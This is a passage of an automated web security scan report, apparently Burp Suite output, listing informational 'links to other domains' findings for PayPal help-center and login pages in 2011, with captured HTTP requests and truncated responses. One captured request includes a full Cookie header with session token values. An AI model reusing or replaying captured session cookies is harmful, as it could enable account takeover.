https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/site_catalyst/pp_jscode_080706.js
https://www.paypalobjects.com/en_US/i/icon/pp_favicon_x.ico
https://www.paypalobjects.com/en_US/i/pui/apple-touch-icon.png
https://www.paypalobjects.com/en_US/i/scr/pixel.gif

Request

GET /cgi-bin/webscr?cmd=_pp-redir&id=MDBNLCMADMUSEYPA HTTP/1.1
Host: www.paypal.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.paypal-portal.com/paypal-labs/?p=68
Cookie: cwrClyrK4LoCV1fydGbAxiNL6iG=cEEifxQAcWhGlglOcVqTXHnflUU31cXJ9zmpTH-bkMZ63y3KWwyWm1S_wthfujnPpyu2W4STSi-gmhCVUo64KaVXQQILqRDSucSQbYL1pWAfqJVdDOJtz7jsJDIQPGitDlZlIm%7cKCcYeNx26ncV9woIxidLpWBlvM2P-apdRSZFl3m_LbX2WQwmWH-z-dsLYusl_O-ES5k0i0%7cmtijiXZuPSV3kyj6Q94Y4zdws77PbwG-L8-dHyJkdT_oZI_fZpfuPH5mj4WOkYpeUDQWgG%7c1313114298; KHcl0EuY7AKSMgfvHl7J5E7hPtK=OGXUOFHbwQ9WE3sALZ1qIFid-EZw9v8a_qL0LLVFCQKL5SI2sHzGcjrqppn1hBQoGV8q5Xx7qjDOH9OJ; cookie_check=yes; navcmd=_help; consumer_display=USER_HOMEPAGE%3d0%26USER_TARGETPAGE%3d0%26USER_FILTER_CHOICE%3d0%26BALANCE_MODULE_STATE%3d1%26GIFT_BALANCE_MODULE_STATE%3d1%26LAST_SELECTED_ALIAS_ID%3d0%26SELLING_GROUP%3d1%26PAYMENT_AND_RISK_GROUP%3d1%26SHIPPING_GROUP%3d1; navlns=0.0; Apache=10.190.9.198.1313112159974960; s_sess=%20s_cc%3Dtrue%3B%20s_ppv%3D0%3B%20tr_p1%3D_help%253A%253A_help%3B%20v31%3DD%253DpageName%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 14:09:55 GMT
Server: Apache
Set-Cookie: navcmd=_pp-redir; domain=.paypal.com; path=/; Secure; HttpOnly
Set-Cookie: navlns=0.0; expires=Thu, 07-Aug-2031 14:09:56 GMT; domain=.paypal.com; path=/; Secure; HttpOnly
Set-Cookie: feel_cookie=a%209%20_pp-redir%20b%205%20_help%20c%206%20webscr%20d%207%20helpscr%20e%200%20%20f%200%20%20g%205%20en_US%20h%205%20en_US%20i%2052%20xpt%2fMarketing_CommandDriven%2fgeneral%2fRedirectCampaign%20j%2023%20xpt%2fHelp%2fhelpcenter%2fHC1%20k%2029%20Campaign%20Redirect%20-%20%20-%20PayPal%20l%2066%20PayPal%20Help%20Center%20-%20Get%20Answers%20to%20Your%20PayPal%20Questions%20-%20PayPal%20; expires=Wed, 31-Dec-1969 23:59:59 GMT; domain=.paypal.com; path=/; Secure; HttpOnly
Vary: Accept-Encoding
Strict-Transport-Security: max-age=500
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 12169

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:ns0="og" lang="en" ns0:xmlns="http://ogp.me/ns#"><head>
<meta http-equiv="Conte
...[SNIP]...
<meta http-equiv="X-UA-Compatible" content="IE=8"><link rel="stylesheet" type="text/css" href="https://www.paypalobjects.com/WEBSCR-640-20110722-1/css/core/paypal.css">

<link rel="shortcut icon" href="https://www.paypalobjects.com/en_US/i/icon/pp_favicon_x.ico"><link rel="apple-touch-icon" href="https://www.paypalobjects.com/en_US/i/pui/apple-touch-icon.png"><style type="text/css" id="antiClickjack">
...[SNIP]...
</script><script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/pp_main.js"></script><script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/lib/min/global.js"></script>
...[SNIP]...
<td><img alt="" border="0" height="50" src="https://www.paypalobjects.com/en_US/i/scr/pixel.gif" width="1"></td>
...[SNIP]...
<td><img alt="" border="0" height="10" src="https://www.paypalobjects.com/en_US/i/scr/pixel.gif" width="1"></td>
...[SNIP]...
</script><script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/lib/min/widgets.js"></script><script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/pp_naturalsearch.js"></script>
...[SNIP]...

<script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/site_catalyst/pp_jscode_080706.js"></script>
...[SNIP]...
<noscript><img
src="//paypal.112.2O7.net/b/ss/paypalglobal/1/H.6--NS/0?pageName=NonJavaScript"
height="1" width="1" border="0" alt="" /></noscript>
...[SNIP]...

7.14. https://www.paypal.com/helpcenter/main.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.paypal.com
Path:	/helpcenter/main.jsp

Issue detail

The page was loaded from a URL containing a query string:

https://www.paypal.com/helpcenter/main.jsp?t=solutionTab&ft=homeTab&ps=&solutionId=

The response contains the following links to other domains:

https://paypal.112.2o7.net/b/ss/paypalglobal/1/H.6--NS/0?pageName=NonJavaScript
https://securepics.ebaystatic.com/aw/pics/paypal/site/us/2011/imgSecRF0711_560wx228.jpg
https://securepics.ebaystatic.com/aw/pics/paypal/site/us/2011/imgSecuritP1_750x70.gif
https://www.paypal-labs.com/
https://www.paypalobjects.com/WEBSCR-640-20110722-1/Marketing/css/pages/ConsumerRevamp.css
https://www.paypalobjects.com/WEBSCR-640-20110722-1/css/core/core.css
https://www.paypalobjects.com/WEBSCR-640-20110722-1/css/marketing/marketing.css
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/iconix.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/lib/min/global.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/lib/min/widgets.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/opinionlab/oo_engine.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/pageBlockingUnsafeBrowsers.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/pp_naturalsearch.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/site_catalyst/pp_jscode_080706.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/tns/mid.js
https://www.paypalobjects.com/en_US/Marketing/i/scr/scr_cpr_graydots_547x1.gif
https://www.paypalobjects.com/en_US/i/icon/pp_favicon_x.ico
https://www.paypalobjects.com/en_US/i/logo/logo_VIPwhite_66x27.gif
https://www.paypalobjects.com/en_US/i/pui/apple-touch-icon.png
https://www.paypalobjects.com/js/tns/min/bid.js
https://www.x.com/

Request

GET /helpcenter/main.jsp?t=solutionTab&ft=homeTab&ps=&solutionId= HTTP/1.1
Host: www.paypal.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 13:48:37 GMT
Server: Apache
Cache-Control: private
Pragma: no-cache
Expires: Thu, 05 Jan 1995 22:00:00 GMT
Set-Cookie: navcmd=_home-general; domain=.paypal.com; path=/; Secure; HttpOnly
Set-Cookie: navlns=0.0; expires=Thu, 07-Aug-2031 13:48:38 GMT; domain=.paypal.com; path=/; Secure; HttpOnly
Vary: Accept-Encoding
Strict-Transport-Security: max-age=500
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 24748

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:ns0="og" lang="en" ns0:xmlns="http://ogp.me/ns#"><head>
<meta http-equiv="Conte
...[SNIP]...
<meta http-equiv="X-UA-Compatible" content="IE=8"><link media="all" rel="stylesheet" type="text/css" href="https://www.paypalobjects.com/WEBSCR-640-20110722-1/css/core/core.css"><link media="screen" rel="stylesheet" type="text/css" href="https://www.paypalobjects.com/WEBSCR-640-20110722-1/css/marketing/marketing.css"><link media="screen" rel="stylesheet" type="text/css" href="https://www.paypalobjects.com/WEBSCR-640-20110722-1/Marketing/css/pages/ConsumerRevamp.css">

<link rel="apple-touch-icon" href="https://www.paypalobjects.com/en_US/i/pui/apple-touch-icon.png"><style type="text/css" id="antiClickjack">
...[SNIP]...
</style><script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/lib/min/global.js"></script><script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/tns/mid.js"></script>
...[SNIP]...
</script><link rel="shortcut icon" href="https://www.paypalobjects.com/en_US/i/icon/pp_favicon_x.ico"></head>
...[SNIP]...
href=https://www.paypal.com/cgi-bin/webscr?cmd=_mpi-click-outside&cid=8444&oid=49775&bn=AjYsXGN6DA8XUCUfQBA&s=NAo3MxA&landing_url=ORAcFnkYQgcdFgwCQFsADwo8KBopNBZsFSYkQDgsRQoGSHRsYAZlZEZUYQhnRXNWYlRFUw><img src='https://securepics.ebaystatic.com/aw/pics/paypal/site/us/2011/imgSecRF0711_560wx228.jpg' border='0' alt=''/></a>
...[SNIP]...
</div><img src="https://www.paypalobjects.com/en_US/Marketing/i/scr/scr_cpr_graydots_547x1.gif" border="0" class="dottedline" alt=""><p class="acceptCredit">
...[SNIP]...
href=https://www.paypal.com/cgi-bin/webscr?cmd=_mpi-click-outside&cid=8444&oid=49777&bn=AjYsXGN6DA8XUCUfQBA&s=NAo3MxA&landing_url=ORAcFnkYQgcdFgwCQFsADwo8KBopNBZsFSYkQDgsRQoGSHRsYAZlZEZUYQhnRXNWYlRFUQ><img src='https://securepics.ebaystatic.com/aw/pics/paypal/site/us/2011/imgSecuritP1_750x70.gif' border='0' alt=''/></a>
...[SNIP]...
<li><a href="https://www.x.com/">PayPal Developers</a>
...[SNIP]...

<script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/opinionlab/oo_engine.js"></script>
...[SNIP]...
<li><a href="https://www.paypal-labs.com">PayPal Labs</a>
...[SNIP]...
<a target="_blank" href="https://www.paypal.com/cgi-bin/webscr?cmd=xpt/Customer/popup/SecurityKeyVIP-outside" onClick="PAYPAL.core.openWindow(event, {width: 425, height: 350})"><img border="0" src="https://www.paypalobjects.com/en_US/i/logo/logo_VIPwhite_66x27.gif" alt=""></a>
...[SNIP]...
</div><script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/lib/min/widgets.js"></script><script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/iconix.js"></script><script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/pageBlockingUnsafeBrowsers.js"></script><script type="text/javascript" src="https://www.paypalobjects.com/js/tns/min/bid.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/pp_naturalsearch.js"></script>
...[SNIP]...

<script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/site_catalyst/pp_jscode_080706.js"></script>
...[SNIP]...
<noscript><img
src="//paypal.112.2O7.net/b/ss/paypalglobal/1/H.6--NS/0?pageName=NonJavaScript"
height="1" width="1" border="0" alt="" /></noscript>
...[SNIP]...

7.15. https://www.paypal.com/helpcenter/main.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.paypal.com
Path:	/helpcenter/main.jsp

Issue detail

The page was loaded from a URL containing a query string:

https://www.paypal.com/helpcenter/main.jsp?t=searchTab&dosearch=true&locale=en_US&_dyncharset=UTF-8&countrycode=US&cmd=_help&searchstring=All

The response contains the following links to other domains:

https://paypal.112.2o7.net/b/ss/paypalglobal/1/H.6--NS/0?pageName=NonJavaScript
https://www.paypal-community.com/t5/us/ct-p/us
https://www.paypal-labs.com/
https://www.paypalobjects.com/HELPWEB-640-20110207-1/css/core/global.css
https://www.paypalobjects.com/HELPWEB-640-20110207-1/css/core/print.css
https://www.paypalobjects.com/HELPWEB-640-20110207-1/css/help/helpCenterSearchResults.css
https://www.paypalobjects.com/HELPWEB-640-20110207-1/css/help/helpcenter.css
https://www.paypalobjects.com/HELPWEB-640-20110207-1/css/helpcenter/css/atgss_solutionEditor.css
https://www.paypalobjects.com/HELPWEB-640-20110207-1/js/dojo-04/dojo.js
https://www.paypalobjects.com/HELPWEB-640-20110207-1/js/helpcenter/script/atgss_common.js
https://www.paypalobjects.com/HELPWEB-640-20110207-1/js/helpcenter/script/atgss_search.js
https://www.paypalobjects.com/HELPWEB-640-20110207-1/js/helpcenter/script/atgss_solutionDocumentView.js
https://www.paypalobjects.com/HELPWEB-640-20110207-1/js/lib/min/global.js
https://www.paypalobjects.com/HELPWEB-640-20110207-1/js/lib/min/widgets.js
https://www.paypalobjects.com/HELPWEB-640-20110207-1/js/opinionlab/oo_engine.js
https://www.paypalobjects.com/HELPWEB-640-20110207-1/js/site_catalyst/pp_jscode_080706.js
https://www.paypalobjects.com/en_US/i/help/loading.gif
https://www.paypalobjects.com/en_US/i/icon/pp_favicon_x.ico
https://www.paypalobjects.com/en_US/i/pui/apple-touch-icon.png
https://www.x.com/

Request

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 13:48:31 GMT
Server: Apache
Set-Cookie: help_cookie=; expires=Mon, 19-Sep-2011 01:48:32 GMT; domain=paypal.com; path=/; Secure; HttpOnly
Set-Cookie: feel_cookie=a%205%20_help%20b%200%20%20c%207%20helpscr%20d%200%20%20e%200%20%20f%200%20%20g%205%20en_US%20h%200%20%20i%2030%20xpt%2fHelp%2fhelpcenter%2fHelpCenter%20j%200%20%20k%2066%20PayPal%20Help%20Center%20-%20Get%20Answers%20to%20Your%20PayPal%20Questions%20-%20PayPal%20l%200%20%20; expires=Wed, 31-Dec-1969 23:59:59 GMT; path=/; Secure; HttpOnly
Vary: Accept-Encoding
Strict-Transport-Security: max-age=500
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:ns0="og" lang="en" ns0:xmlns="http://ogp.me/ns#"><head>
<meta http-equiv="Conte
...[SNIP]...
<meta http-equiv="X-UA-Compatible" content="IE=8"><link media="screen" rel="stylesheet" type="text/css" href="https://www.paypalobjects.com/HELPWEB-640-20110207-1/css/core/global.css"><link rel="stylesheet" type="text/css" href="https://www.paypalobjects.com/HELPWEB-640-20110207-1/css/helpcenter/css/atgss_solutionEditor.css"><link rel="stylesheet" type="text/css" href="https://www.paypalobjects.com/HELPWEB-640-20110207-1/css/help/helpcenter.css"><link rel="stylesheet" type="text/css" href="https://www.paypalobjects.com/HELPWEB-640-20110207-1/css/help/helpCenterSearchResults.css">

<link media="print" rel="stylesheet" type="text/css" href="https://www.paypalobjects.com/HELPWEB-640-20110207-1/css/core/print.css"><style type="text/css">
...[SNIP]...
</script><script type="text/javascript" src="https://www.paypalobjects.com/HELPWEB-640-20110207-1/js/lib/min/global.js"></script>
...[SNIP]...
</script><link rel="shortcut icon" href="https://www.paypalobjects.com/en_US/i/icon/pp_favicon_x.ico"><link rel="apple-touch-icon" href="https://www.paypalobjects.com/en_US/i/pui/apple-touch-icon.png"></head>
...[SNIP]...
</script>

<script type="text/javascript" src="https://www.paypalobjects.com/HELPWEB-640-20110207-1/js/dojo-04/dojo.js"></script>

<script type="text/javascript" src="https://www.paypalobjects.com/HELPWEB-640-20110207-1/js/helpcenter/script/atgss_solutionDocumentView.js"></script>

<script type="text/javascript" src="https://www.paypalobjects.com/HELPWEB-640-20110207-1/js/helpcenter/script/atgss_common.js"></script>

<script type="text/javascript" src="https://www.paypalobjects.com/HELPWEB-640-20110207-1/js/helpcenter/script/atgss_search.js"></script>
...[SNIP]...
<div class="communityChat" style="display: block;">
       Find help in the <a href="https://www.paypal-community.com/t5/us/ct-p/us"/>PayPal Community Help</a>
...[SNIP]...
<div id="imageLoadingArea" style="display: block;">
               <img style="display:none;" src="https://www.paypalobjects.com/en_US/i/help/loading.gif" id="loadAction"></img>
...[SNIP]...

<script type="text/javascript" src="https://www.paypalobjects.com/HELPWEB-640-20110207-1/js/site_catalyst/pp_jscode_080706.js"></script>
...[SNIP]...
<noscript>
       <img src="//paypal.112.2O7.net/b/ss/paypalglobal/1/H.6--NS/0?pageName=NonJavaScript"
       height="1" width="1" border="0" alt="" />
   </noscript>
...[SNIP]...
<li><a href="https://www.x.com/">PayPal Developers</a>
...[SNIP]...

<script type="text/javascript" src="https://www.paypalobjects.com/HELPWEB-640-20110207-1/js/opinionlab/oo_engine.js"></script>
...[SNIP]...
<li><a href="https://www.paypal-labs.com">PayPal Labs</a>
...[SNIP]...
</div><script type="text/javascript" src="https://www.paypalobjects.com/HELPWEB-640-20110207-1/js/lib/min/widgets.js"></script>
...[SNIP]...

7.16. https://www.paypal.com/helpcenter/main.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.paypal.com
Path:	/helpcenter/main.jsp

Issue detail

The page was loaded from a URL containing a query string:

https://www.paypal.com/helpcenter/main.jsp?t=browseTab&ft=browseTab&opentopic=11400004&locale=en_US&topicTreeId=&showcontent=true&lstLanguageResults=&_dyncharset=UTF-8&countrycode=US&cmd=_help&m=BT

The response contains the following links to other domains:

https://paypal.112.2o7.net/b/ss/paypalglobal/1/H.6--NS/0?pageName=NonJavaScript
https://www.paypal-community.com/t5/us/ct-p/us
https://www.paypal-labs.com/
https://www.paypalobjects.com/HELPWEB-640-20110207-1/css/core/global.css
https://www.paypalobjects.com/HELPWEB-640-20110207-1/css/core/print.css
https://www.paypalobjects.com/HELPWEB-640-20110207-1/css/help/helpCenterBrowseTopics.css
https://www.paypalobjects.com/HELPWEB-640-20110207-1/css/help/helpcenter.css
https://www.paypalobjects.com/HELPWEB-640-20110207-1/css/helpcenter/css/atgss_solutionEditor.css
https://www.paypalobjects.com/HELPWEB-640-20110207-1/js/dojo-04/dojo.js
https://www.paypalobjects.com/HELPWEB-640-20110207-1/js/helpcenter/script/atgss_common.js
https://www.paypalobjects.com/HELPWEB-640-20110207-1/js/helpcenter/script/atgss_search.js
https://www.paypalobjects.com/HELPWEB-640-20110207-1/js/helpcenter/script/atgss_solutionDocumentView.js
https://www.paypalobjects.com/HELPWEB-640-20110207-1/js/lib/min/global.js
https://www.paypalobjects.com/HELPWEB-640-20110207-1/js/lib/min/widgets.js
https://www.paypalobjects.com/HELPWEB-640-20110207-1/js/opinionlab/oo_engine.js
https://www.paypalobjects.com/HELPWEB-640-20110207-1/js/site_catalyst/pp_jscode_080706.js
https://www.paypalobjects.com/en_US/i/help/loading.gif
https://www.paypalobjects.com/en_US/i/icon/pp_favicon_x.ico
https://www.paypalobjects.com/en_US/i/pui/apple-touch-icon.png
https://www.x.com/

Request

GET /helpcenter/main.jsp?t=browseTab&ft=browseTab&opentopic=11400004&locale=en_US&topicTreeId=&showcontent=true&lstLanguageResults=&_dyncharset=UTF-8&countrycode=US&cmd=_help&m=BT HTTP/1.1
Host: www.paypal.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 13:48:36 GMT
Server: Apache
Set-Cookie: help_cookie=; expires=Mon, 19-Sep-2011 01:48:38 GMT; domain=paypal.com; path=/; Secure; HttpOnly
Set-Cookie: feel_cookie=a%205%20_help%20b%200%20%20c%207%20helpscr%20d%200%20%20e%200%20%20f%200%20%20g%205%20en_US%20h%200%20%20i%2030%20xpt%2fHelp%2fhelpcenter%2fHelpCenter%20j%200%20%20k%2066%20PayPal%20Help%20Center%20-%20Get%20Answers%20to%20Your%20PayPal%20Questions%20-%20PayPal%20l%200%20%20; expires=Wed, 31-Dec-1969 23:59:59 GMT; path=/; Secure; HttpOnly
Vary: Accept-Encoding
Strict-Transport-Security: max-age=500
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 118865

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:ns0="og" lang="en" ns0:xmlns="http://ogp.me/ns#"><head>
<meta http-equiv="Conte
...[SNIP]...
<meta http-equiv="X-UA-Compatible" content="IE=8"><link media="screen" rel="stylesheet" type="text/css" href="https://www.paypalobjects.com/HELPWEB-640-20110207-1/css/core/global.css"><link rel="stylesheet" type="text/css" href="https://www.paypalobjects.com/HELPWEB-640-20110207-1/css/helpcenter/css/atgss_solutionEditor.css"><link rel="stylesheet" type="text/css" href="https://www.paypalobjects.com/HELPWEB-640-20110207-1/css/help/helpcenter.css"><link rel="stylesheet" type="text/css" href="https://www.paypalobjects.com/HELPWEB-640-20110207-1/css/help/helpCenterBrowseTopics.css">

<link media="print" rel="stylesheet" type="text/css" href="https://www.paypalobjects.com/HELPWEB-640-20110207-1/css/core/print.css"><style type="text/css">
...[SNIP]...
</script><script type="text/javascript" src="https://www.paypalobjects.com/HELPWEB-640-20110207-1/js/lib/min/global.js"></script>
...[SNIP]...
</script><link rel="shortcut icon" href="https://www.paypalobjects.com/en_US/i/icon/pp_favicon_x.ico"><link rel="apple-touch-icon" href="https://www.paypalobjects.com/en_US/i/pui/apple-touch-icon.png"></head>
...[SNIP]...
</script>

<script type="text/javascript" src="https://www.paypalobjects.com/HELPWEB-640-20110207-1/js/dojo-04/dojo.js"></script>

<script type="text/javascript" src="https://www.paypalobjects.com/HELPWEB-640-20110207-1/js/helpcenter/script/atgss_solutionDocumentView.js"></script>

<script type="text/javascript" src="https://www.paypalobjects.com/HELPWEB-640-20110207-1/js/helpcenter/script/atgss_common.js"></script>

<script type="text/javascript" src="https://www.paypalobjects.com/HELPWEB-640-20110207-1/js/helpcenter/script/atgss_search.js"></script>
...[SNIP]...
<div class="communityChat" style="display: block;">
       Find help in the <a href="https://www.paypal-community.com/t5/us/ct-p/us"/>PayPal Community Help</a>
...[SNIP]...
<div id="ppSearchLoadingArea" style="display: block;">
           <img style="display:none;" src="https://www.paypalobjects.com/en_US/i/help/loading.gif" id="loadAction"></img>
...[SNIP]...

<script type="text/javascript" src="https://www.paypalobjects.com/HELPWEB-640-20110207-1/js/site_catalyst/pp_jscode_080706.js"></script>
...[SNIP]...
<noscript>
       <img src="//paypal.112.2O7.net/b/ss/paypalglobal/1/H.6--NS/0?pageName=NonJavaScript"
       height="1" width="1" border="0" alt="" />
   </noscript>
...[SNIP]...
<li><a href="https://www.x.com/">PayPal Developers</a>
...[SNIP]...

<script type="text/javascript" src="https://www.paypalobjects.com/HELPWEB-640-20110207-1/js/opinionlab/oo_engine.js"></script>
...[SNIP]...
<li><a href="https://www.paypal-labs.com">PayPal Labs</a>
...[SNIP]...
</div><script type="text/javascript" src="https://www.paypalobjects.com/HELPWEB-640-20110207-1/js/lib/min/widgets.js"></script>
...[SNIP]...

7.17. https://www.paypal.com/us/cgi-bin/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.paypal.com
Path:	/us/cgi-bin/

Issue detail

The page was loaded from a URL containing a query string:

https://www.paypal.com/us/cgi-bin/?cmd=_login-run

The response contains the following links to other domains:

https://paypal.112.2o7.net/b/ss/paypalglobal/1/H.6--NS/0?pageName=NonJavaScript
https://securepics.ebaystatic.com/aw/pics/paypal/site/us/2011/imgSecRF0711_560wx228.jpg
https://www.paypal-labs.com/
https://www.paypalobjects.com/WEBSCR-640-20110722-1/css/core/global.css
https://www.paypalobjects.com/WEBSCR-640-20110722-1/css/core/print.css
https://www.paypalobjects.com/WEBSCR-640-20110722-1/css/flows/flowHFR.css
https://www.paypalobjects.com/WEBSCR-640-20110722-1/css/pages/pageLogin.css
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/hostedpayments/hostedpayments.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/iconix.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/lib/min/global.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/lib/min/widgets.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/opinionlab/oo_engine.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/pageBlockingUnsafeBrowsers.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/pp_naturalsearch.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/site_catalyst/pp_jscode_080706.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/tns/mid.js
https://www.paypalobjects.com/en_US/i/icon/pp_favicon_x.ico
https://www.paypalobjects.com/en_US/i/icon/secure_lock_2.gif
https://www.paypalobjects.com/en_US/i/logo/logo_VIPwhite_66x27.gif
https://www.paypalobjects.com/en_US/i/pui/apple-touch-icon.png
https://www.paypalobjects.com/js/tns/min/bid.js
https://www.x.com/

Request

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 01:25:59 GMT
Server: Apache
Cache-Control: private
Pragma: no-cache
Expires: Thu, 05 Jan 1995 22:00:00 GMT
Set-Cookie: navcmd=_login-run; domain=.paypal.com; path=/; Secure; HttpOnly
Set-Cookie: navlns=0.0; expires=Thu, 07-Aug-2031 01:26:00 GMT; domain=.paypal.com; path=/; Secure; HttpOnly
Set-Cookie: feel_cookie=a%2010%20_login-run%20b%205%20_help%20c%206%20webscr%20d%207%20helpscr%20e%200%20%20f%200%20%20g%205%20en_US%20h%205%20en_US%20i%2011%20p%2fgen%2flogin%20j%2023%20xpt%2fHelp%2fhelpcenter%2fHC1%20k%2014%20Login%20-%20PayPal%20l%2066%20PayPal%20Help%20Center%20-%20Get%20Answers%20to%20Your%20PayPal%20Questions%20-%20PayPal%20; expires=Wed, 31-Dec-1969 23:59:59 GMT; domain=.paypal.com; path=/; Secure; HttpOnly
Vary: Accept-Encoding
Strict-Transport-Security: max-age=500
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 18886

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:ns0="og" lang="en" ns0:xmlns="http://ogp.me/ns#"><head>
<meta http-equiv="Conte
...[SNIP]...
<meta http-equiv="X-UA-Compatible" content="IE=8"><link media="screen" rel="stylesheet" type="text/css" href="https://www.paypalobjects.com/WEBSCR-640-20110722-1/css/core/global.css"><link rel="stylesheet" type="text/css" href="https://www.paypalobjects.com/WEBSCR-640-20110722-1/css/pages/pageLogin.css"><link rel="stylesheet" type="text/css" href="https://www.paypalobjects.com/WEBSCR-640-20110722-1/css/flows/flowHFR.css">

<link media="print" rel="stylesheet" type="text/css" href="https://www.paypalobjects.com/WEBSCR-640-20110722-1/css/core/print.css"><style type="text/css">
...[SNIP]...
</script><script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/lib/min/global.js"></script>
...[SNIP]...
</script><link rel="shortcut icon" href="https://www.paypalobjects.com/en_US/i/icon/pp_favicon_x.ico"><link rel="apple-touch-icon" href="https://www.paypalobjects.com/en_US/i/pui/apple-touch-icon.png"></head>
...[SNIP]...
</span> <img src="https://www.paypalobjects.com/en_US/i/icon/secure_lock_2.gif" border="0" alt=""></div>
...[SNIP]...
<a href=https://www.paypal.com/us/cgi-bin/webscr?cmd=_mpi-click-outside&cid=8444&oid=49773&bn=HQsPRgpZ&s=NAo3MxA&landing_url=ORAcFnkYQgcdFgwCQFsADwo8KBopNBZsFSYkQDgsRQoGSHRsYAZlZEZUYQhnRXNWYlRFV3E><img src='https://securepics.ebaystatic.com/aw/pics/paypal/site/us/2011/imgSecRF0711_560wx228.jpg' border='0' alt=''/></a>
...[SNIP]...
<li><a href="https://www.x.com/">PayPal Developers</a>
...[SNIP]...

<script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/opinionlab/oo_engine.js"></script>
...[SNIP]...
<li><a href="https://www.paypal-labs.com">PayPal Labs</a>
...[SNIP]...
<a target="_blank" href="https://www.paypal.com/us/cgi-bin/webscr?cmd=xpt/Customer/popup/SecurityKeyVIP-outside" onClick="PAYPAL.core.openWindow(event, {width: 425, height: 350})"><img border="0" src="https://www.paypalobjects.com/en_US/i/logo/logo_VIPwhite_66x27.gif" alt=""></a>
...[SNIP]...
</div><script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/lib/min/widgets.js"></script><script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/hostedpayments/hostedpayments.js"></script><script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/pageBlockingUnsafeBrowsers.js"></script><script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/tns/mid.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="https://www.paypalobjects.com/js/tns/min/bid.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/iconix.js"></script><script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/pp_naturalsearch.js"></script>
...[SNIP]...

<script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/site_catalyst/pp_jscode_080706.js"></script>
